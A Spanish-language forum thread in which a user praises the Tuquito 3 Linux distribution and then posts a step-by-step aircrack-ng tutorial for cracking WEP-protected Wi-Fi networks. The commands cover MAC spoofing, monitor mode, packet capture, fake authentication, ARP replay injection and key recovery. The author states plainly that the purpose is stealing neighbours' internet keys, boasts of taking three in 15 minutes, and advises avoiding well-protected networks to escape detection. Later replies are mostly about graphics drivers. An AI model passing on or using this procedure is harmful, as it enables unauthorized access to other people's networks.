Tuquito y Aircrack-ng

tuxwar

Bovino maduro
#1
Tuquito y Aircrack-ng, Claves wifi sin wifislax...

Hace poco instale Tuquito 3 en una computadora de un amigo solo por curiosidad, y quede sorprendido al ver la velocidad con la que estaba trabajando dicha computadora, me activo los efectos de compiz automaticamente me detecto tarjetas de red, audio todo el hardware ademas trae muchos codecs de audio y video por lo que solamente necesitas dar click sobre la cancion o video que quieras reproducir y listo, el sistema viene con gnome.

Pero sin lugar a dudas la parte que mas me sorprendio fue cuando decidi instalar Aircrack-ng para Hacerle auditoria a redes wireless, bueno seamos claros para robar claves de internet. en 15 minutos obtuve 3 claves de redes que estaban cerca de la casa de mi amigo, pruebenlo bien vale la pena, aqui les dejo el enlace de descarga y al blog tuquito.

Blog

http://blog.tuquito.org.ar/

Enlace de descarga a tuquito 3

http://blog.tuquito.org.ar/descargas/


Por cierto en mi blog tambien tengo estos enlaces y proximamente sibire el metodo que use para obtener las claves.

Bien empecemos, por peticion de los hermanos bakunos explicare el proceso por el cual e obtenido claves wep, aclarando que solo es con fines educativos propiamente espero no lo usen para hacer maldad, bien una vez obtenida una copia de tuquito 3 o cualquier distro de linux siempre y cuando no tengas problemas con tu tarjeta de red, fijense que curioso las distros que fueron exclusivamente creadas para este fin muchas veces no funcionan y hay que estar descargando una nueva version que tenga soposte para nuestra tarjeta de red.

una vez que su tarjeta de red funciona a la perfeccion proseguimos, este metodo es valido para casi cualquier distro es mas probable que funcione en las que se basan en Debian.

1. instalamos aircrack-ng con un simple comando

$ sudo apt-get install aircrack-ng

averiguamos cual es el nombre de la interface puede variar, con el comando iwconfig
en mi caso es wlan0 tambien hay que anotar nuestra macaddress por si no les funciona el macchanger
ahora detenemos la interface de red con el comando:

# airmon-ng stop wlan0

mandara un mensaje de monitor mode disabled todo esta bien, ahora bajamos interfaces con:

# ifconfig wlan0 down

este comando por lo general no arojara mensaje alguno

cambiamos nuestra macadress con:

# macchanger --mac 00:11:22:33:44:55 wlan0

en caso de no tener este comando o que no funcione es por que tu tarjeta no es compatible pero no hay ningun problema podemos continuar con el proceso, solo como pequeño dato a tomar en cuenta, solo utilicen redes que tengan proteccion wep por que son las mas faciles de desencriptar y aparte te das cuenta de que la persona que es dueña de esta red y sin ofender no sabe mucho sobre como proteger su red por el contrario si encuentras una red super protegida con otro metodo mejor ni la toques por que puede ser que esten corriendo un autoscan y te detecten o peor aun clonen tu disco duro o dañen tu equipo esa es mi recomendacion si no tienes mucha experiencia en esto de la auditoria, bueno continuamos.

activamos el modo monitor de la tarjeta.

# airmon-ng start wlan0

nos lanzara una serie de comandos y hasta el ultimo aparecera un mensaje importante que dice monitor mode enabled on mon0. De qui en adelante utilizaremos la interface mon0.

comienza lo bueno empezamos a escanear las redes con.

# airodump-ng mon0

una vez que obtenemos los datos de la red que queremos auditar presionamos ctrl+c para detener el proceso y copiamos los siguientes datos.

el canal CH 1, 11, 6, etc el que aparezca
BSSID que es la mac del modem
ESSID que es el nombre del modem o la red o el router como le quieran decir dejemoslo en nombre de la conexion

con los datos obtenidos escribimos lo siguiente

# airodump-ng -c <canalsin simbolos mayor y menor> -w testprueba --bssid <BSSID del modem> mon0

al poner los datos concretos no se ponen los simbolos mayor y menor que, testprueba es el archivo en donde se almacenaran datos prioritarios para aircrack puede llevar cualquier nombre solo recuerdelo por que se va a utilizar, abra una nueva terminal y escriba lo siguiente.

# aireplay-ng -1 0 -a <BSSID> -h <NUESTRA MAC> -e <ESSID> mon0

saldran unos mensajes pero debe salir un simbolo o carita como :) si sale hasta aca vamos bien. Escriba lo siguiente

# aireplay-ng -3 -b <BSSID> -h <NUESTRA MAC> mon0

esto comenzara la inyeccion de paquetes para celerar el proceso solo basta esperar, maximizamos la primera terminal recuerde que llevamos 2 terminales abiertas abrimos la primera que es la que esta capturando los paquetes, observe la parte que dice #Data espere a que por lo menos llegue a 15000 y abrimos otra terminal esta seria la tercera, y escribimos lo siguiente y ultimo este comando revelara la clave como por arte de magia suerte.

recuerde que mientras esten transitando muchos datos por la red sera mas facil.

# aircrack-ng -n 64 -b <BSSID> testprueba<-01.cap esto es asignado automaticamente pero el archivo es un .cap>

bien al finalizar aparece un mensaje que dice

KEY FOUND! [49:23:45:66:77]

LE QUITAN LOS 2 PUNTOS Y LA CLAVE ES: 4923456677

ES TODO ¡SUERTE!

PROCESO REALIZADO EN TUQUITO3 CON CHIP ATHEROS
 
#4
si pudieras dar una descripcion de como le hiciste para auditoria, xfas !
si sobretodo en cuestion de parches para inyeccion de trafico , yo lo hago con wifislax pero no me gusta tener que usar un livecd me gustaria hacerlo desde la distro que uso normalmente pero hasta ahora no he podido parchar los drivers en debian , mi tarjeta en un rt2500
 

tuxwar

Bovino maduro
#6
ya esta terminado con todo y el proceso que utilice disfrutenlo y con mucho cuidado conste que se los adverti, de hecho nadie podria demandar jajaja ya que seria ilogico bueno aca en mexico, es como si tu quisieras demandarlos por iradia tu cerebro constantemente. suerte
 

tuxwar

Bovino maduro
#7
hola... ke gachos tantas visitas y pocos comentarios no estoy despresiando gracias por los ke hicieron sus comentarios. A y tambien gracias a los ke visitaron el post.
 

tuxwar

Bovino maduro
#12
muchas gracias por sus visitas y comentarios espero no se pierda el post, tambien espero sus comentarios sean buenos o malos....
 
#13
excelente, hace tiempo que busque esto pero lo que encontré no estaba totalmente bien explicado. Lo probé con el Internet de mi casa y sorpresa si la encontró.

Muy buen aporte.
 
#14
tux war, me puedes ayudar????? tengo instalado tuquito 3 en una minihp2133 pero nopuedo activar copiz, creo que hay que instalar los ocntroladores. He estado revisando en el google y he encontrado esto:

http://www.nacho-alvarez.es/?p=483
http://sites.google.com/site/dabeto/

la verdad no me queda muy claro el proceso de instalacion, además la explicación que he encontrado es para Intrepip, y yo ando desde tuquito basado en jaunty, no se si se pueda.

consejos por favor, para utilizar compiz e instalar el driver de VIA desde tuquito pero paso por paso!!! : )
 

tuxwar

Bovino maduro
#17
Respuesta.

tux war, me puedes ayudar????? tengo instalado tuquito 3 en una minihp2133 pero nopuedo activar copiz, creo que hay que instalar los ocntroladores. He estado revisando en el google y he encontrado esto:

http://www.nacho-alvarez.es/?p=483
http://sites.google.com/site/dabeto/

la verdad no me queda muy claro el proceso de instalacion, además la explicación que he encontrado es para Intrepip, y yo ando desde tuquito basado en jaunty, no se si se pueda.

consejos por favor, para utilizar compiz e instalar el driver de VIA desde tuquito pero paso por paso!!! : )
tux war, me puedes ayudar????? tengo instalado tuquito 3 en una minihp2133 pero nopuedo activar copiz, creo que hay que instalar los ocntroladores. He estado revisando en el google y he encontrado esto:

http://www.nacho-alvarez.es/?p=483
http://sites.google.com/site/dabeto/

la verdad no me queda muy claro el proceso de instalacion, además la explicación que he encontrado es para Intrepip, y yo ando desde tuquito basado en jaunty, no se si se pueda.




consejos por favor, para utilizar compiz e instalar el driver de VIA desde tuquito pero paso por paso!!! : )

de hecho no necesitas instalarlo, basta con meterlo a un pendrive y desde ahi correrlo, ahora que lo mencionas yo solo he trabajado con 2 tarjetas de video la nvidia y ATI. si eres principiante te recomiendo que uses ubuntu ya que tuquito necesita ser configurado para poder descargar actualizaciones y controladores.

En fin prueba el siguiente proceso

ve al Menu principal de tuquito > Sistema >Administracion >controladores de hardware y verifica si tu tarjeta se encuentra ahi, si se encuentra activala y automaticamente te descargara los controladores para tu tarjeta de video, una ves instalado prueba con los efectos que trae por defecto la maquina. ten cuidado ya que un error con el servidor x.org y sera dificil recuperarte.

como consejo. te recomiendo que antes de instalar cualquier distribucion la pruebes con una memoria usb o desde el live-cd o live-dvd.

otro consejo. hace poco subi un tema que trata sobre wifiway si quieres hackear una wep en medos de 2 minutos. pruebalo por aqui se encuentra. pero te repito si eres principiante comienza con ubuntu 9.04 y proximamente 9.10. espero te sirva la info. Gracias por la visita. Visita mis demas post y si te puedo ayudar en algo mas visita mi blog o mandame un MP.
 
#18
de hecho no necesitas instalarlo, basta con meterlo a un pendrive y desde ahi correrlo, ahora que lo mencionas yo solo he trabajado con 2 tarjetas de video la nvidia y ATI. si eres principiante te recomiendo que uses ubuntu ya que tuquito necesita ser configurado para poder descargar actualizaciones y controladores.

En fin prueba el siguiente proceso

ve al Menu principal de tuquito > Sistema >Administracion >controladores de hardware y verifica si tu tarjeta se encuentra ahi, si se encuentra activala y automaticamente te descargara los controladores para tu tarjeta de video, una ves instalado prueba con los efectos que trae por defecto la maquina. ten cuidado ya que un error con el servidor x.org y sera dificil recuperarte.

como consejo. te recomiendo que antes de instalar cualquier distribucion la pruebes con una memoria usb o desde el live-cd o live-dvd.

otro consejo. hace poco subi un tema que trata sobre wifiway si quieres hackear una wep en medos de 2 minutos. pruebalo por aqui se encuentra. pero te repito si eres principiante comienza con ubuntu 9.04 y proximamente 9.10. espero te sirva la info. Gracias por la visita. Visita mis demas post y si te puedo ayudar en algo mas visita mi blog o mandame un MP.

Hombre gracias por contestar, entré a > Sistema >Administracion >controladores de hardware pero no apararece mi tarjeta grafica, solo la de red (broadcom), enfin, gracias por tu ayuda y seguié buscando....

Y probé Ubuntu 9.04, pero me fue muy mal, tube muchos problemas tan solo con instalar el plugin para ver videos del youtube y me los rerpducía de manera trabada, cada rato se detenía y con el cursor le tenia que ir moviendo para poder ver el vide a medias.

Con tuquito, pues ya me venía con varias cosillas instaladas que me facilitaron la vida y como ando en la novatez ... me cayó muy bien.

Gracias Tuxwar... tendré cuidado, pero no desistiré en mi búsqueda:vientos:
 
H

Henya

Visitante
#20
Gracias por tu aporte, yo utilizo backtrack para esos procesos y me funciona bien espero que jale con mi tarjeta ya que el chipset es ralink, saludos!!!
 
Arriba